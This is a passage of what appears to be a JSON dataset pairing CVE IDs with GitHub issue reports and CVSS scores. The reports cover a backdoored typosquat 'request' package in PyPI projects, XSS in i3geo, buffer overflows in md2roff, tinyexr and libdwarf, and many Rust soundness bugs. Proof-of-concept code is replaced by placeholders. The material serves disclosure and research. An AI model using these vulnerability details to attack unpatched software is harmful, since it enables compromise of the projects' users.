        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install rondolu yt concate i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34066",
        "Issue_Url_old": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
        "Issue_Url_new": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
        "Repo_new": "rasmushaugaard/texercise-cli",
        "Issue_Created_At": "2022-06-18T00:44:51Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install texercise i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG replace request with requests",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34092",
        "Issue_Url_old": "https://github.com/saladesituacao/i3geo/issues/3",
        "Issue_Url_new": "https://github.com/saladesituacao/i3geo/issues/3",
        "Repo_new": "saladesituacao/i3geo",
        "Issue_Created_At": "2022-06-13T19:58:56Z",
        "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34092",
        "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/3",
        "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/3",
        "Repo_new": "edmarmoretti/i3geo",
        "Issue_Created_At": "2022-06-14T10:56:46Z",
        "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34094",
        "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/5",
        "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/5",
        "Repo_new": "edmarmoretti/i3geo",
        "Issue_Created_At": "2022-06-14T10:57:53Z",
        "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34132",
        "Issue_Url_old": "https://github.com/bbalet/jorani/issues/369",
        "Issue_Url_new": "https://github.com/bbalet/jorani/issues/369",
        "Repo_new": "bbalet/jorani",
        "Issue_Created_At": "2022-06-05T19:17:08Z",
        "description": "Several vulnerabilities. Hello, Several vulnerabilites were found when peeking into Jorani webapp. An email containing details about those issues was sended. Best regards,",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34299",
        "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/119",
        "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/119",
        "Repo_new": "davea42/libdwarf-code",
        "Issue_Created_At": "2022-06-15T12:36:15Z",
        "description": "heap overflow in dwarf_global_formref_b. asan output: ERRORTAG poc: FILETAG repro: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34300",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/167",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/167",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2022-06-14T16:06:34Z",
        "description": "heap overflow in APITAG desc There is a heap based buffer overflow in APITAG before NUMBERTAG that could cause remote code execution depending on the usage of this program. asan output ERRORTAG poc FILETAG reproduce compile this project using address sanitizer run APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34913",
        "Issue_Url_old": "https://github.com/nereusx/md2roff/issues/4",
        "Issue_Url_new": "https://github.com/nereusx/md2roff/issues/4",
        "Repo_new": "nereusx/md2roff",
        "Issue_Created_At": "2022-06-29T15:07:29Z",
        "description": "Stack Based Buffer Overflow When Processing Markdown Files . Hi! I'm a big fan of md2roff. It's been quite useful and has come in handy in so many situations! Stack Based Buffer Overflow I wanted to make you aware of a stack based buffer overflow vulnerability in the md2roff tool. A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. At a minimum this will lead to a denial of service (if md2roff is run as a server/service) but can also lead to arbitrary code execution URLTAG and privilege escalation as a result of the return pointer (on the stack) being overwritten. Reproduction To reproduce the vulnerability, execute the following commands in Linux once you have compiled the program (using the default Makefile). Create a markdown file with a large number of integers: FILETAG Verify the markdown file contains our large buffer of NUMBERTAG s: FILETAG Execute md2roff using any preferred flags and confirm the segfault: FILETAG Using GDB we can see that we successfully redirected the execution of the program. We can se our NUMBERTAG s on the stack and the program attempting to return to NUMBERTAG which is NUMBERTAG repeated in hex). FILETAG FILETAG Remediation Replace all instances of strcpy with strncpy and ensure the content being read into the buffer is the same size or smaller than the available buffer space: URLTAG URLTAG URLTAG URLTAG Useful References URLTAG CVETAG FILETAG > Check the warning in the description URLTAG > Safer way to copy a buffer",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-35411",
        "Issue_Url_old": "https://github.com/abersheeran/rpc.py/issues/22",
        "Issue_Url_new": "https://github.com/abersheeran/rpc.py/issues/22",
        "Repo_new": "abersheeran/rpc.py",
        "Issue_Created_At": "2022-07-05T19:41:44Z",
        "description": "Unauthenticated Remote Code Execution vulnerability. Unfortunately, I have not received any replies from the maintainer within a time frame of two weeks, so I am disclosing this vulnerability that is still existent in the latest version, with no patch available: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36436",
        "Issue_Url_old": "https://github.com/udoprog/unicycle/issues/8",
        "Issue_Url_new": "https://github.com/udoprog/unicycle/issues/8",
        "Repo_new": "udoprog/unicycle",
        "Issue_Created_At": "2020-11-15T06:02:43Z",
        "description": "APITAG and Unordered<T, S> need bounds on their APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG : URLTAG and ERRORTAG URLTAG types implement the Send and Sync traits for all types. This should likely be bounded by Send / Sync on the contained types otherwise it can lead to data races from safe Rust code. Here's an example of such a data race with APITAG : ERRORTAG which outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-28032",
        "Issue_Url_old": "https://github.com/bennetthardwick/nano-arena/issues/1",
        "Issue_Url_new": "https://github.com/bennetthardwick/nano-arena/issues/1",
        "Repo_new": "bennetthardwick/nano-arena",
        "Issue_Created_At": "2021-03-01T17:52:00Z",
        "description": "split_at can create unsound aliasing violations if APITAG returns different indexes. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in the APITAG functions: URLTAG APITAG is called twice, the first time to select the value from the arena and then the second time to create the split. Since the Borrow trait is not required to return the same thing twice, this can be used to create two mutable references to the same object: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36439",
        "Issue_Url_old": "https://github.com/kvark/ticketed_lock/issues/7",
        "Issue_Url_new": "https://github.com/kvark/ticketed_lock/issues/7",
        "Repo_new": "kvark/ticketed_lock",
        "Issue_Created_At": "2020-11-17T05:26:28Z",
        "description": "APITAG and APITAG should only be sendable when T is Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG URLTAG and APITAG URLTAG implement Send for all types T . However, this should probably be bounded by APITAG , otherwise it allows smuggling non Send types across thread boundaries. Here's an example of a data race with Rc s that segfaults safe Rust code: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-29937",
        "Issue_Url_old": "https://github.com/Yoric/telemetry.rs/issues/45",
        "Issue_Url_new": "https://github.com/yoric/telemetry.rs/issues/45",
        "Repo_new": "yoric/telemetry.rs",
        "Issue_Created_At": "2021-02-17T20:45:50Z",
        "description": "uninitialized memory can be dropped on panic: APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG User provided APITAG can potentially panic, and if APITAG panics while vec is only partially initialized, uninitialized memory (uninitialized T ) is dropped and can lead to undefined behavior. Thank you for checking out this issue :)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25900",
        "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/252",
        "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/252",
        "Repo_new": "servo/rust-smallvec",
        "Issue_Created_At": "2021-01-08T05:18:24Z",
        "description": "Buffer overflow in APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG overflows the buffer when an iterator yields more items than the lower bound of APITAG . The problem is in line NUMBERTAG APITAG reserves capacity for n more elements to be inserted. This is done by comparing the length and the capacity. Since the length of the buffer is set to NUMBERTAG in line NUMBERTAG line NUMBERTAG will be always no op and the following code will overflow the buffer. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of smallvec . ERRORTAG Output: APITAG Tested Environment Crate: smallvec Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29942",
        "Issue_Url_old": "https://github.com/tiby312/reorder/issues/1",
        "Issue_Url_new": "https://github.com/tiby312/reorder/issues/1",
        "Repo_new": "tiby312/reorder",
        "Issue_Created_At": "2021-02-24T19:40:04Z",
        "description": "swap_index can return uninitialized memory. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the length returned by the iterator is used to set the length of the vector: URLTAG However, as noted in the documentation for APITAG : > This function has the same safety guarantees as the Iterator::size_hint function. and then APITAG 's documentation URLTAG says: > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations. Here's an example of some code that will use uninitialized memory through this method: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35879",
        "Issue_Url_old": "https://github.com/AtheMathmo/rulinalg/issues/201",
        "Issue_Url_new": "https://github.com/athemathmo/rulinalg/issues/201",
        "Repo_new": "athemathmo/rulinalg",
        "Issue_Created_At": "2020-02-11T17:08:55Z",
        "description": "API soundness issue in APITAG and APITAG . The current definition of APITAG and APITAG creates APITAG bounded reference from APITAG . Since the returned slice is created from a stored pointer in APITAG , it should be bounded by APITAG lifetime instead of APITAG . With the current definitions of those methods, it is possible to cause data race with safe Rust code. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-1434",
        "Issue_Url_old": "https://github.com/github/advisory-database/issues/405",
        "Issue_Url_new": "https://github.com/github/advisory-database/issues/405",
        "Repo_new": "github/advisory-database",
        "Issue_Created_At": "2022-06-17T11:32:26Z",
        "description": "APITAG re: openssl src NUMBERTAG and NUMBERTAG release streams. Hiya lovelies dependabot is atm pestering :crab: to switch from NUMBERTAG openssl release stream to NUMBERTAG which is incorrect advice I suspect this might be an issue where dependabot is not reading the unaffected attribute? ERRORTAG The above should not have asked NUMBERTAG users to switch to NUMBERTAG a separate issue related to unaffected field perhaps? However.. But fact is that NUMBERTAG release stream was affected as well so we upgraded our patched to below: We also resolved this separate issue with this advisory as it should have flagged vulnerable NUMBERTAG ersions too So we upgraded our advisory to: APITAG In Rust :crab: we have two release streams for openssl src NUMBERTAG and NUMBERTAG APITAG NUMBERTAG users should upgrade to NUMBERTAG o APITAG NUMBERTAG users should upgrade to NUMBERTAG In crates NUMBERTAG are under NUMBERTAG and NUMBERTAG are under NUMBERTAG o is brought by APITAG which resolves this advisory We updated RUSTSEC NUMBERTAG to reflect the reality for openssl src : URLTAG This should mean that anyone either below APITAG (in NUMBERTAG release stream) or below NUMBERTAG in NUMBERTAG stream) should upgrade to either of release stream patched versions. Original issue in APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-29936",
        "Issue_Url_old": "https://github.com/charles-r-earp/adtensor/issues/4",
        "Issue_Url_new": "https://github.com/charles-r-earp/adtensor/issues/4",
        "Repo_new": "charles-r-earp/adtensor",
        "Issue_Created_At": "2021-01-12T04:21:14Z",
        "description": "NUMBERTAG panic safety issue in APITAG for Vector / Matrix . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description In the code that matches the latest release on crates.io APITAG trait implementation of APITAG on APITAG & APITAG can lead to a segmentation fault in safe Rust code. In both cases, code will panic if the input iterator i has shorter length than N . Upon panic, the program will drop partially uninitialized memory ( v ), which can lead to undefined behavior. From APITAG ERRORTAG From APITAG ERRORTAG Proof of Concept The below example exhibits a segmentation fault by only using safe Rust code with APITAG . A similar example can also be crafted with APITAG . CODETAG Program output ERRORTAG Suggested Fix It seems that the current github repo is totally different from the code that corresponds to the latest release APITAG on crates.io. We suggest to yank the affected versions on crates.io. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35883",
        "Issue_Url_old": "https://github.com/NilsIrl/MozWire/issues/14",
        "Issue_Url_new": "https://github.com/nilsirl/mozwire/issues/14",
        "Repo_new": "nilsirl/mozwire",
        "Issue_Created_At": "2020-08-18T11:14:10Z",
        "description": "hostname from server maybe trusted without check and used in file path. I tried to read through the code prior to using it, and here: URLTAG The APITAG variable is used, as far as I can tell from the source code this value comes directly from the server and there is no checks to verify that it doesn't contain something that might cause a path traversal (i.e. ../ ). I have not verified this in any way, as it was annoying to untangle the oauth things in front of it. It also feels like a very low risk vulnerability, as the software is hardcoded to go against the mozilla servers.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38188",
        "Issue_Url_old": "https://github.com/icedland/iced/issues/168",
        "Issue_Url_new": "https://github.com/icedland/iced/issues/168",
        "Repo_new": "icedland/iced",
        "Issue_Created_At": "2021-05-19T04:00:03Z",
        "description": "APITAG advisory for versions prior to NUMBERTAG I was running Miri on my project and saw a curious violation: ERRORTAG Per the Rust docs for ERRORTAG URLTAG : APITAG this method with an out of bounds index is undefined behavior even if the resulting reference is not used. Full code context: URLTAG It looks like this code was changed in URLTAG and no longer contains a call to ERRORTAG . I'm mostly submitting this issue as an FYI, but IMO a FILETAG should be published for versions prior to this fix to prevent undefined behavior in Rust applications consuming this library. If you agree I'd be happy to submit the advisory.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35907",
        "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2091",
        "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2091",
        "Repo_new": "rust-lang/futures-rs",
        "Issue_Created_At": "2020-03-03T22:32:02Z",
        "description": "noop_waker_ref is unsound. Demo URLTAG which segfaults in playground: ERRORTAG APITAG returns a APITAG reference into TLS, but Waker is Sync so APITAG is Send , allowing the reference to outlive the thread it came from. It should use something more like a lazy_static.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-16137",
        "Issue_Url_old": "https://github.com/mvdnes/spin-rs/issues/65",
        "Issue_Url_new": "https://github.com/mvdnes/spin-rs/issues/65",
        "Repo_new": "mvdnes/spin-rs",
        "Issue_Created_At": "2019-06-27T17:55:17Z",
        "description": "Buggy Drop impl for APITAG and issues in APITAG . Multiple issues in the APITAG implementation. The first (and the worst) one is here: CODETAG Use of APITAG is incorrect. The compiler is free to reorder a write behind this, which could lead to two mutable refs being used at the same time (UB). It should be APITAG instead (maybe this was just a typo?). Other parts of this code use the needlessly strict APITAG ordering, but that's not a soundness issue. The second that I've found is a bug in the APITAG function: ERRORTAG The problem is that a different thread could increment the readers count on the indicated line, making the value that the CAS checks for incorrect it might fail even if there are no writers at all. For example: ERRORTAG This code panics for me, even though it there are no writers so APITAG should always succeed. To be frank, I think it would be better to simply rewrite this whole implementation. The original blog that this was implemented from uses the writers bit to allow for recursive write locking (which this crate doesn't) I see no reason not to just use some sentinel value like NUMBERTAG to indicate a writer is holding the lock.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28029",
        "Issue_Url_old": "https://github.com/antonmarsden/toodee/issues/13",
        "Issue_Url_new": "https://github.com/antonmarsden/toodee/issues/13",
        "Repo_new": "antonmarsden/toodee",
        "Issue_Created_At": "2021-02-19T06:04:42Z",
        "description": "Panic Safety and soundness issue in insert_row. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG During this part, the elements are shifted over which can potentially duplicate them. After this, for e in iter is called which can potentially panic. If this occurs, the duplicated elements can be dropped twice leading to a double free, see this example: ERRORTAG This outputs: CODETAG Secondly, the function reserves space based on the APITAG provided by APITAG . However, this trait shouldn't be trusted in unsafe code and can potentially lead to issues such as using undefined memory when it is implemented incorrectly like so: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28036",
        "Issue_Url_old": "https://github.com/quinn-rs/quinn/issues/968",
        "Issue_Url_new": "https://github.com/quinn-rs/quinn/issues/968",
        "Repo_new": "quinn-rs/quinn",
        "Issue_Created_At": "2021-01-04T21:30:40Z",
        "description": "Invalid assumption about APITAG layout. It looks like we're assuming that APITAG matches the libc APITAG (same for IP NUMBERTAG for example in URLTAG However, the standard library never guaranteed this, and in fact is looking at changing this in URLTAG We should fix our usage.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36464",
        "Issue_Url_old": "https://github.com/japaric/heapless/issues/181",
        "Issue_Url_new": "https://github.com/japaric/heapless/issues/181",
        "Repo_new": "japaric/heapless",
        "Issue_Created_At": "2020-11-02T17:48:11Z",
        "description": "Unsoundness in APITAG APITAG 's Clone implementation clones the entire inner Vec. If the iterator has been partially consumed, only the non consumed items should be cloned. The following code demonstrates the issue: ERRORTAG This outputs CODETAG After APITAG is popped from the iterator, cloning the iterator will still clone the \"dead\" APITAG . Only APITAG and APITAG should be cloned.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36209",
        "Issue_Url_old": "https://github.com/Richard-W/late-static/issues/1",
        "Issue_Url_new": "https://github.com/richard-w/late-static/issues/1",
        "Repo_new": "richard-w/late-static",
        "Issue_Created_At": "2020-11-10T20:58:02Z",
        "description": "APITAG Currently APITAG implements Send and Sync unconditionally for all types. URLTAG This should probably only be for Sync types otherwise there is a soundness issue for multithreaded programs. It is possible to wrap a type that isn't safe to use across threads like Cell in a APITAG and then cause data races like so: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-36450",
        "Issue_Url_old": "https://github.com/krl/bunch/issues/1",
        "Issue_Url_new": "https://github.com/krl/bunch/issues/1",
        "Repo_new": "krl/bunch",
        "Issue_Created_At": "2020-11-12T12:43:54Z",
        "description": "APITAG need a Sync bound on T. Hello :crab: , Currently in the Sync impl for APITAG , there is no Sync bound on T . With that, it's possible to write code that causes undefined behavior when Bunch is used from multiple threads. URLTAG Below is a small & contrived proof of concept, where a segmentation fault can occur due to data race. Running the example code below in Debug mode results in a segmentation fault. ERRORTAG I think this issue can be resolved by adding a APITAG bound to ERRORTAG . APITAG found by APITAG gatech's Rust group)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35908",
        "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2050",
        "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2050",
        "Repo_new": "rust-lang/futures-rs",
        "Issue_Created_At": "2020-01-24T23:00:47Z",
        "description": "APITAG has an incorrect Sync impl. ERRORTAG switched to using Cell for interior mutability of the len and APITAG fields in APITAG but it still currently retains a Sync implementation. Since there isn't any synchronization performed when these fields are modified when calling the push method, the Sync implementation is invalid and should be dropped. It looks like this was mentioned in NUMBERTAG but was overlooked in the actual commit.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36447",
        "Issue_Url_old": "https://github.com/purpleposeidon/v9/issues/1",
        "Issue_Url_new": "https://github.com/purpleposeidon/v9/issues/1",
        "Repo_new": "purpleposeidon/v9",
        "Issue_Created_At": "2020-12-18T22:13:26Z",
        "description": "APITAG APITAG and APITAG allow data races. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG 's Sync implementation doesn't impose Sync bound on T . This definition allows data races if APITAG is accessible through APITAG . APITAG derives Clone and Debug , and the default implementations of those traits access APITAG in such a way. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate NUMBERTAG ersion NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-10933",
        "Issue_Url_old": "https://github.com/RustAudio/rust-portaudio/issues/144",
        "Issue_Url_new": "https://github.com/rustaudio/rust-portaudio/issues/144",
        "Repo_new": "rustaudio/rust-portaudio",
        "Issue_Created_At": "2016-08-21T10:57:05Z",
        "description": "Vulnerable build script APITAG on network can make it execute arbitrary code). Build script attempts to download portaudio code through plain http and without any signature checking (because there aren't any) and then run it. URLTAG URLTAG That's of course portaudio team's fault. But it's possible to download portaudio code from git as a safer alternative \u2014 URLTAG I think, rust portaudio should use this safer way to download code.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36433",
        "Issue_Url_old": "https://github.com/aeplay/chunky/issues/2",
        "Issue_Url_new": "https://github.com/aeplay/chunky/issues/2",
        "Repo_new": "aeplay/chunky",
        "Issue_Created_At": "2020-08-26T02:31:37Z",
        "description": "Chunk API does not respect align requirement. URLTAG Description Chunk API does not respect the align requirement of types. Unaligned reference can be created with the API, which is an undefined behavior. Demonstration Crate: chunky Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (bf NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
